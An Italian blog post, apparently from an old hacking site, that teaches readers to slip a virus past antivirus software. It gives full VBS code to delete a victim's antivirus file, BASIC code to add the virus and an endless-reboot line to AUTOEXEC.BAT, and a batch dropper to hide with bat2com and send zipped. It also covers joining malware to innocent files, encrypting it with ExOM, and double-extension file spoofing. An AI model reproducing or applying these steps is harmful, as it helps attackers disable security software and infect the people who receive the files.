Eheh, come da titolo oggi vi mostrero i modi per cercare di fregare un antivirus, vi fa gola neh?! Oh, si vi vedo gia sbavare… pero smettetela perche se sbavate sul pc vi si sputtana… XDXD
Ok, allora…. COMINCIAMO!
I TOOLS NECESSARI:
Vi servono:
- un computer
- un virus
- Blade Joiner (o un qualsiasi Joiner x WinZozz)
- Bat2Com
- ExOM
-Merendine
-Musica
FUNZIONAMENTO DI UN ANTIVIRUS
Le tecniche utilizzate dai prodotti antivirus sono due: la ricerca euristica e il riconoscimento della firma digitale.
* Ricerca euristica
L’antivirus analizza il file (programma o documento) cercando porzioni di codice in grado di svolgere azioni insolite. Funzione tipica delle applicazioni più costose, destinate in particolare a sistemi di protezione aziendale e per grandi banche dati, è una tecnica molto complessa perché implica, da parte di chi la sviluppa, la conoscenza perfetta dei programmi e dei sistemi operativi. In pratica, si tratta di capire come può essere infettato un sistema e di conoscere i punti deboli dei programmi che possono esservi installati. A questo punto il programmatore dovrà sviluppare un software in grado di anticipare l’attività sospetta diretta ai punti deboli identificati. Il grande pregio di questa tecnica consiste nel fatto che l’antivirus è un passo in avanti rispetto ai possibili virus, è già pronto cioè prima che questi vengano creati. Il suo difetto nel numero di falsi allarmi, anche molto elevato in funzione della sensibilità e della completezza del prodotto. La maggior parte degli antivirus in commercio include anche un motore di ricerca euristica, la cui efficacia è tuttavia strettamente correlata al prezzo del prodotto: un antivirus per uso personale non offre, in genere, un sistema di rilevazione euristica particolarmente efficace.
* Riconoscimento della firma digitale
L’antivirus mette a confronto il codice dei file da controllare con quello dei virus conosciuti. Le informazioni su questi ultimi sono raccolte in un database che deve essere aggiornato a intervalli regolari e brevissimi (anche una volta al giorno). È la tecnica utilizzata dalla maggior parte dei prodotti per uso personale (in effetti, da tutti i prodotti, con un’unica eccezione). Il suo pregio è che consente di mantenere contenuto il prezzo dell’antivirus, il suo difetto è che si trova sempre un passo indietro rispetto ai virus. Perché sia efficace occorre infatti che il virus sia stato trovato e che la sua descrizione sia stata inserita nel database: solo così potrà essere riconosciuto e neutralizzato dal software. Per i programmi più diffusi, i rispettivi produttori mettono a disposizione aggiornamenti frequenti del database, anche quotidiani: è quindi necessario collegarsi al sito ed effettuare l’aggiornamento online delle informazioni, procedura che in genere non richiede più di qualche minuto.
TECNICA 1: IL JOINER
Una famosa tecnica x nascondere i virus sono i joiner. Il loro funzionamento è molto semplice: creano un file .EXE che è l’unione di due files. Uno di questi 2 files deve essere per forza un file .EXE. L’antivirus non capta il virus mescolato con un altro file perchè non risconosce la firma digitale… L’unico difetto di questa tecnica è che i files ottenuti dalla fusione sono files molto grandi, e quindi potrebbero destare sospetto. Il migliore joiner in circolazione su internet è il Blade Joiner. Questo infatti dispone di diverse funzionalità (esempio: ha la notificazione ad ICQ); uno tra i migliori è anche il Senna Spy Exe Maker. Questi due files sono scaricabili dalla SEZIONE UTILIY del sito. I files mescolati nn devono essere per forza files .EXE ma possono anche essere di diversa estensione (jpeg,bitmap…).
TECNICA 2: ELIMINAZIONE
Una tecnica molto laboriosa per eliminare il controllo dell’antivirus è eliminare l’antivirus!!! Semplicemente basta creare un file .VBS con il comando di trovare il file principale dell’antivirus e eliminarlo, quindi riavviare il computer ed eseguire il virus.
Come? Così:
TAGLIA QUI
SALVA IL FILE COME CERCA.VBS
‘*********************************************
Cerca files antivirus e distruggi
‘*********************************************
Dim WSHShell
Set WSHShell = WScript.CreateObject(”WScript.Shell”)
Dim windir,systemdir
object = “C:” ‘ Il drive in cui devi effettuare la ricerca
On Error Resume Next
Dim fso, f1, f2, s
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set f2 = fso.GetFile(object & “danieletempinserisci_il.nome”) ‘Inserisci il nome del file
f2.Delete
‘Nel caso non sappiate quale antivirus sia installato nel computer della vittima vi consiglio di inserire più nomi di files da cercare ed eliminare. Basta compiare per più volte il codice che si trova dopo il “On Error resume next” e prima di questo suggerimento.
Sub Welcome()
Dim intDoIt
intDoIt = MsgBox(L_Welcome_MsgBox_Message_Text, _
vbOKCancel + vbInformation, _
L_Welcome_MsgBox_Title_Text )
If intDoIt = vbCancel Then
WScript.Quit
End If
End Sub
TAGLIA QUI
Rinomina il file CERCA.VBS con CERCA.VBSS
A questo punto c’è il bisogno di aggiungere una stringa nel file AUTOEXEC.BAT che apra il virus dopo il riavvio del pc. In questo caso bastano poche righe di Basic:
Taglia qui…
REM *********************************************
REM *
REM * Aggiugni stringhe a file autoexec.bat
REM *
REM *
REM *
REM *
REM *
REM *********************************************
REM RINOMINA IL FILE COME CON.BAS
10 CLS
20 OPEN (”C:AUTOEXEC.BAT”) FOR APPEND AS #1
30 PRINT #1, ” ” ‘Inserisci tra le virgolette il nome del virus. Non dimenticarti del ‘ percorso se il file non si trova nella directory C:
40 PRINT #1,”c:windowsrundll32.exe user,exitwindows” ‘Riavvia il pc all’infinito…
50 CLOSE
60 END
Taglia qui…
Dopo aver scritto il codice sorgente compila il file CON.BAS. Il risultato sarà CON.EXE. Rinomina CON.EXE COME CON.EYE
Ora manca solo un programma Smascheri(al momento giusto) ed esegua gli altri due file. Ho scelto x queste azioni un file .BAT. Il codice sorgente è il seguente:
Taglia qui…
@echo off
echo *********************************************>nul
echo * *>nul
echo * Rinomina i files, eseguili,cancellali e *>nul
echo * *>nul
echo * riavvia il pc. *>nul
echo * *>nul
echo * *>nul
echo * *>nul
echo * *>nul
echo * *>nul
echo *********************************************>nul
@echo>nul
@echo RINOMINA IL FILE SETUP.BAT>NUL
@ren CERCA.VBSS CERCA.VBS
@ren CON.EYE CON.EXE
@cerca.vbs
@con.exe
@c:windowsrundll32.exe user,exitwindows
@exit
Taglia qui…
Anche in questo caso è meglio nascondere il codice sorgente del file SETUP.BAT. Quindi apriamo il programma bat2com e scriviamo:
bat2com SETUP.BAT
Il risultato sarà un file di nome SETUP.COM
Racchiudi tutto in una cartella con il virus. Magari racchiudi il tutto con Winzip e il tuo virus è pronto x essere inviato.
TECNICA 3: ENCRYPTER
Questa è una nuova tecnica che ho sperimentato e ideato personalmente. Consiste nell’encryptare un file in modo che nn possa essere disassemblato e quindi neanche rilevato dal sistema di riconoscimento della firma digitale dell’antivirus. Il vero problema di questa tecnica, è il programma. Questo infatti è difficilmente reperibile soprattuto per i virus che solitamente funzionano sotto dos. Il programma migliore che ho trovato è stato l’ExOm. Per encryptare un file basta digitare…
exom nomefile.estensione
Nessuna di queste tecniche da SOLA garantisce un affidabilità del 100%. Vi consiglio infatti di mescolare tra loro le tecniche descritte. Come??
Esempio:
Per prima cosa encrypto il file; poi lo mescolo con un altro file con il blade joiner. In seguito creo un sistema per eliminare l’anitvirus come quello descritto nel capitolo 5.0. In questo modo avrete più possibilità di successo.
IL FILE TIPE SPOOFING
Lo spoofing dei tipi di file è una tecnica usata, spesso anche dai virus, per simulare che un certo file corrisponda ad un tipo diverso da ciò che è realmente: in questo modo si può ingannare un utente facendogli credere che un certo attachment sembri un’immagine JPG, un archivio ZIP o qualsiasi altra cosa, quando in realtà non lo è. Un primo tipo di inganno, quello delle estensioni, è molto semplice da realizzare e si basa sul fatto che Windows (95/98/ME) gestisce male le estensioni associate ai diversi tipi di files. Infatti il sistema di Microsoft è stato progettato (di default) per non visualizzare le estensioni dei tipi di files che hanno un’associazione nel registro. Ciò vuol dire che un file ARCHIVIO.ZIP viene mostrato all’interno di Esplora Risorse e degli altri programmi solo col nome ARCHIVIO, senza visualizzare la sua estensione e può essere riconosciuto dalla classica icona associata ai file di Winzip. Questa constatazione ci pone un primo interrogativo: cosa succede ad un file rinominato (volutamente) col nome ARCHIVIO.ZIP.EXE? Questo viene considerato un file di Winzip o un eseguibile? Ecco quindi in cosa consiste il primo inganno sui tipi di file: usando questo trucco della “doppia estensione” Windows riconosce il file come un .EXE (quindi lo tratta come un eseguibile) tuttavia visualizza solo il nome senza l’estensione, quindi per un utente ignaro di questo fatto, il file porterà il nome ARCHIVIO.ZIP, quando in realtà è un’applicazione .EXE. Questo trucco è stato usato da molti worm come il famigerato ZIP Explorer. Per accorgersi della frode l’unica cosa che si può fare (oltre ad usare un buon antivirus) è quella di far visualizzare a Windows le estensioni dei files, anche per quelli associati ad applicazioni. Questa opzione si può attivare da Esplora Risorse nel menu Strumenti/Opzioni Cartella o Visualizza/Opzioni Cartella. In questo modo un’e-mail che porta dietro una attachment, visualizza il file allegato col suo nome reale, mostrando magari che questo in realtà è un eseguibile.
Nessun commento:
Posta un commento